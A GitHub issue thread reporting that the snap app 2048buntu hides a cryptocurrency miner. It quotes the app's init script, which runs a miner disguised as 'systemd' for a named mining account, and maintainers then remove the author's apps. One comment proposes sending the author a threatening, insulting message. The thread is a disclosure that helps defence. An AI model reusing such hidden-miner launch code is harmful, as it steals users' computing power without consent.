Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How to ask to ban the application for security reasons? #651

Closed
tarwirdur opened this Issue May 11, 2018 · 9 comments

Comments

Projects
None yet
7 participants
@tarwirdur
Copy link

tarwirdur commented May 11, 2018

This application contains hidden сrypto-currency miner inside.

  • squashfs-root/systemd - miner
  • squashfs-root/start - init script:
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

I did not find way to complain about the application. Which way is good for it?

@mathe30

This comment has been minimized.

Copy link

mathe30 commented May 12, 2018

send him a message on the email that says :

@mathe30

This comment has been minimized.

Copy link

mathe30 commented May 12, 2018

I know your lil dirty secrity , remove the application or I am gonna send this on public and will let your mum know that you are cheap bitch

@sparkiegeek sparkiegeek self-assigned this May 12, 2018

@sparkiegeek

This comment has been minimized.

Copy link
Collaborator

sparkiegeek commented May 12, 2018

Thanks for the report, we're removing these from the store whilst we investigate

@tarwirdur

This comment has been minimized.

Copy link
Author

tarwirdur commented May 12, 2018

@sparkiegeek, note that other application from this author contains miner too. (I've checked only for 2048buntu and hextris, but suppose that other contains it too).

UPD: already deleted. Thank you.

@sparkiegeek

This comment has been minimized.

Copy link
Collaborator

sparkiegeek commented May 12, 2018

@tarwirdur yes, we've removed all applications from this author pending further investigations.

Thank you for your vigilance!

@Enerccio

This comment has been minimized.

Copy link

Enerccio commented May 13, 2018

aww let the poor guy get his ferrari...

@tdemin

This comment has been minimized.

Copy link

tdemin commented May 13, 2018

@Enerccio what's the point in being poor and getting a Ferrari?

@oliwarner

This comment has been minimized.

Copy link

oliwarner commented May 13, 2018

Any plans to push a fake package update that forcibly uninstalls this crap?

@Ads20000

This comment has been minimized.

Copy link

Ads20000 commented May 13, 2018

For future reference the store category on the snapcraft forum is probably the best place to ask for a store removal. Pretty much all the snappy developers watch that forum pretty regularly so you'd possibly get an even swifter response than the one you got here.

Also I've started a topic there asking what action will be taken to make this less likely to happen in the future.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.